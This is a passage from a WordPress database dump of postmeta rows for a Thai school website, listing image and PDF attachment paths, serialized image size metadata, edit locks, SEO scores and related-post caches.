eight\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9317, 4141, '_wp_attached_file', '2018/10/1539860879873.jpg'),
(9318, 4141, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:25:\"2018/10/1539860879873.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"1539860879873-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"1539860879873-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"1539860879873-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"1539860879873-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:25:\"1539860879873-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9319, 4142, '_wp_attached_file', '2018/10/1539860875337-1.jpg'),
(9320, 4142, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:27:\"2018/10/1539860875337-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"1539860875337-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"1539860875337-1-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"1539860875337-1-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"1539860875337-1-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:27:\"1539860875337-1-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9330, 4139, '_hide_featured', NULL),
(9331, 4139, '_yoast_wpseo_content_score', '30'),
(9332, 4139, '_yoast_wpseo_primary_category', '3'),
(9333, 4139, '_wpas_done_all', '1'),
(9334, 4139, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575587352;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6008;}i:1;a:1:{s:2:\"id\";i:5906;}i:2;a:1:{s:2:\"id\";i:5562;}}}}'),
(9339, 4150, '_edit_lock', '1540177934:3'),
(9340, 4150, '_edit_last', '3'),
(9341, 4151, '_wp_attached_file', '2018/10/22-10-2561-9-36-07.jpg'),
(9342, 4151, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:456;s:6:\"height\";i:610;s:4:\"file\";s:30:\"2018/10/22-10-2561-9-36-07.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"22-10-2561-9-36-07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"22-10-2561-9-36-07-224x300.jpg\";s:5:\"width\";i:224;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"22-10-2561-9-36-07-224x300.jpg\";s:5:\"width\";i:224;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9343, 4152, '_wp_attached_file', '2018/10/44075853_692795094430015_3937603537113972736_o.jpg'),
(9344, 4152, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2018/10/44075853_692795094430015_3937603537113972736_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"44075853_692795094430015_3937603537113972736_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"44075853_692795094430015_3937603537113972736_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"44075853_692795094430015_3937603537113972736_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"44075853_692795094430015_3937603537113972736_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"44075853_692795094430015_3937603537113972736_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9345, 4150, '_thumbnail_id', '4152'),
(9349, 4150, '_hide_featured', NULL),
(9350, 4150, '_yoast_wpseo_content_score', '30'),
(9351, 4150, '_yoast_wpseo_primary_category', '31'),
(9352, 4150, '_wpas_done_all', '1'),
(9353, 4154, '_edit_lock', '1540178267:3'),
(9354, 4154, '_edit_last', '3'),
(9355, 4155, '_wp_attached_file', '2018/10/44306996_693349281041263_5160132155052916736_o.jpg'),
(9356, 4155, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1478;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2018/10/44306996_693349281041263_5160132155052916736_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"44306996_693349281041263_5160132155052916736_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"44306996_693349281041263_5160132155052916736_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"44306996_693349281041263_5160132155052916736_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"44306996_693349281041263_5160132155052916736_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"44306996_693349281041263_5160132155052916736_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9357, 4154, '_thumbnail_id', '4155'),
(9361, 4154, '_hide_featured', NULL),
(9362, 4154, '_yoast_wpseo_content_score', '30'),
(9363, 4154, '_yoast_wpseo_primary_category', '31'),
(9364, 4154, '_wpas_done_all', '1'),
(9365, 4157, '_edit_lock', '1540181297:3'),
(9366, 4157, '_edit_last', '3'),
(9367, 4158, '_wp_attached_file', '2018/10/44258733_694163074293217_2958671853452787712_o.jpg'),
(9368, 4158, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/10/44258733_694163074293217_2958671853452787712_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"44258733_694163074293217_2958671853452787712_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"44258733_694163074293217_2958671853452787712_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"44258733_694163074293217_2958671853452787712_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"44258733_694163074293217_2958671853452787712_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"44258733_694163074293217_2958671853452787712_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9369, 4157, '_thumbnail_id', '4158'),
(9373, 4157, '_hide_featured', NULL),
(9374, 4157, '_yoast_wpseo_content_score', '30'),
(9375, 4157, '_yoast_wpseo_primary_category', '31'),
(9376, 4157, '_wpas_done_all', '1'),
(9377, 4150, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575729914;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4093;}i:1;a:1:{s:2:\"id\";i:4685;}i:2;a:1:{s:2:\"id\";i:4887;}}}}'),
(9378, 4154, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575428741;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5855;}i:1;a:1:{s:2:\"id\";i:5900;}i:2;a:1:{s:2:\"id\";i:4166;}}}}'),
(9379, 4157, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575448525;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4887;}i:1;a:1:{s:2:\"id\";i:4735;}i:2;a:1:{s:2:\"id\";i:4182;}}}}'),
(9380, 4160, '_edit_lock', '1540371878:3'),
(9381, 4160, '_edit_last', '3'),
(9382, 4161, '_wp_attached_file', '2018/10/44597039_695783110797880_1367935727882469376_o.jpg'),
(9383, 4161, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1478;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2018/10/44597039_695783110797880_1367935727882469376_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"44597039_695783110797880_1367935727882469376_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"44597039_695783110797880_1367935727882469376_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"44597039_695783110797880_1367935727882469376_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"44597039_695783110797880_1367935727882469376_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"44597039_695783110797880_1367935727882469376_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9384, 4160, '_thumbnail_id', '4161'),
(9388, 4160, '_hide_featured', NULL),
(9389, 4160, '_yoast_wpseo_content_score', '30'),
(9390, 4160, '_yoast_wpseo_primary_category', '31'),
(9391, 4160, '_wpas_done_all', '1'),
(9392, 4163, '_edit_lock', '1540372411:3'),
(9393, 4163, '_edit_last', '3'),
(9394, 4164, '_wp_attached_file', '2018/10/44573204_696295097413348_6138291680903692288_o.jpg'),
(9395, 4164, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1478;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2018/10/44573204_696295097413348_6138291680903692288_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"44573204_696295097413348_6138291680903692288_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"44573204_696295097413348_6138291680903692288_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"44573204_696295097413348_6138291680903692288_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"44573204_696295097413348_6138291680903692288_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"44573204_696295097413348_6138291680903692288_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9396, 4163, '_thumbnail_id', '4164'),
(9400, 4163, '_hide_featured', NULL),
(9401, 4163, '_yoast_wpseo_content_score', '30'),
(9402, 4163, '_yoast_wpseo_primary_category', '31'),
(9403, 4163, '_wpas_done_all', '1'),
(9404, 4163, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575293700;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4013;}i:1;a:1:{s:2:\"id\";i:4742;}i:2;a:1:{s:2:\"id\";i:5667;}}}}'),
(9405, 4160, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575344967;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5936;}i:1;a:1:{s:2:\"id\";i:5026;}i:2;a:1:{s:2:\"id\";i:5324;}}}}'),
(9406, 4166, '_edit_lock', '1540455561:3'),
(9407, 4166, '_edit_last', '3'),
(9408, 4167, '_wp_attached_file', '2018/10/44657145_696738594035665_5448529111511203840_o.jpg'),
(9409, 4167, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/10/44657145_696738594035665_5448529111511203840_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"44657145_696738594035665_5448529111511203840_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"44657145_696738594035665_5448529111511203840_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"44657145_696738594035665_5448529111511203840_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"44657145_696738594035665_5448529111511203840_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"44657145_696738594035665_5448529111511203840_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9410, 4166, '_thumbnail_id', '4167'),
(9414, 4166, '_hide_featured', NULL),
(9415, 4166, '_yoast_wpseo_content_score', '30'),
(9416, 4166, '_yoast_wpseo_primary_category', '31'),
(9417, 4166, '_wpas_done_all', '1'),
(9418, 4166, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575655779;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6063;}i:1;a:1:{s:2:\"id\";i:6040;}i:2;a:1:{s:2:\"id\";i:4160;}}}}'),
(9419, 4169, '_edit_lock', '1540537721:3'),
(9420, 4169, '_edit_last', '3'),
(9421, 4170, '_wp_attached_file', '2018/10/ประกาศ-ขอเชิญชวนร่วมจัดทำคุณลักษณะฯ-ช่างยนต์-ช่างอิเล็ก-ปี62.pdf'),
(9425, 4169, '_hide_featured', NULL),
(9426, 4169, '_yoast_wpseo_content_score', '60'),
(9427, 4169, '_yoast_wpseo_primary_category', '3'),
(9428, 4169, '_wpas_done_all', '1'),
(9429, 4169, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574597580;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4017;}i:1;a:1:{s:2:\"id\";i:4698;}i:2;a:1:{s:2:\"id\";i:5900;}}}}'),
(9430, 4172, '_edit_lock', '1540539479:3'),
(9431, 4172, '_edit_last', '3'),
(9432, 4173, '_wp_attached_file', '2018/10/ตารางเวร-เดือนพฤศจิกายน-2561.pdf'),
(9436, 4172, '_hide_featured', NULL),
(9437, 4172, '_yoast_wpseo_content_score', '60'),
(9438, 4172, '_yoast_wpseo_primary_category', '3'),
(9439, 4172, '_wpas_done_all', '1'),
(9440, 4172, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575711093;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4662;}i:1;a:1:{s:2:\"id\";i:4006;}i:2;a:1:{s:2:\"id\";i:5361;}}}}'),
(9441, 4176, '_edit_lock', '1540889676:3'),
(9442, 4176, '_edit_last', '3'),
(9443, 4177, '_wp_attached_file', '2018/10/รับสมัครเจ้าหน้าที่-จำนวน-4-อัตรา.pdf'),
(9447, 4176, '_hide_featured', NULL),
(9448, 4176, '_yoast_wpseo_content_score', '30'),
(9449, 4176, '_yoast_wpseo_primary_category', '3'),
(9450, 4176, '_wpas_done_all', '1'),
(9451, 4179, '_edit_lock', '1540890888:3'),
(9452, 4179, '_edit_last', '3'),
(9453, 4180, '_wp_attached_file', '2018/10/รับสมัครครูอัตราจ้าง-จำนวน-12-อัตรา.pdf'),
(9454, 4176, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575633669;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4139;}i:1;a:1:{s:2:\"id\";i:6008;}i:2;a:1:{s:2:\"id\";i:5906;}}}}'),
(9458, 4179, '_hide_featured', NULL),
(9459, 4179, '_yoast_wpseo_content_score', '30'),
(9460, 4179, '_yoast_wpseo_primary_category', '3'),
(9461, 4179, '_wpas_done_all', '1'),
(9462, 4182, '_edit_lock', '1540880701:3'),
(9463, 4182, '_edit_last', '3'),
(9464, 4183, '_wp_attached_file', '2018/10/44958963_699628187080039_6759806506998169600_o.jpg'),
(9465, 4183, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/10/44958963_699628187080039_6759806506998169600_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"44958963_699628187080039_6759806506998169600_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"44958963_699628187080039_6759806506998169600_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"44958963_699628187080039_6759806506998169600_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"44958963_699628187080039_6759806506998169600_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"44958963_699628187080039_6759806506998169600_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9466, 4182, '_thumbnail_id', '4183'),
(9470, 4182, '_hide_featured', NULL),
(9471, 4182, '_yoast_wpseo_content_score', '30'),
(9472, 4182, '_yoast_wpseo_primary_category', '31'),
(9473, 4182, '_wpas_done_all', '1'),
(9474, 4179, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575747541;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5046;}i:1;a:1:{s:2:\"id\";i:4139;}i:2;a:1:{s:2:\"id\";i:5481;}}}}'),
(9475, 4182, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574933180;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4881;}i:1;a:1:{s:2:\"id\";i:5982;}i:2;a:1:{s:2:\"id\";i:4629;}}}}'),
(9476, 4185, '_wp_attached_file', '2018/10/รับสมัครเจ้าหน้าที่-จำนวน-4-อัตรา-แก้ไข.pdf'),
(9479, 4188, '_wp_attached_file', '2018/10/รับสมัครครูอัตราจ้าง-จำนวน-12-อัตรา-แก้ไข.pdf'),
(9482, 4190, '_wp_attached_file', '2018/10/30-10-2561-16-05-34.jpg'),
(9483, 4190, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:821;s:6:\"height\";i:600;s:4:\"file\";s:31:\"2018/10/30-10-2561-16-05-34.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"30-10-2561-16-05-34-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"30-10-2561-16-05-34-300x219.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:219;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"30-10-2561-16-05-34-768x561.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:561;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"30-10-2561-16-05-34-400x292.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:292;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a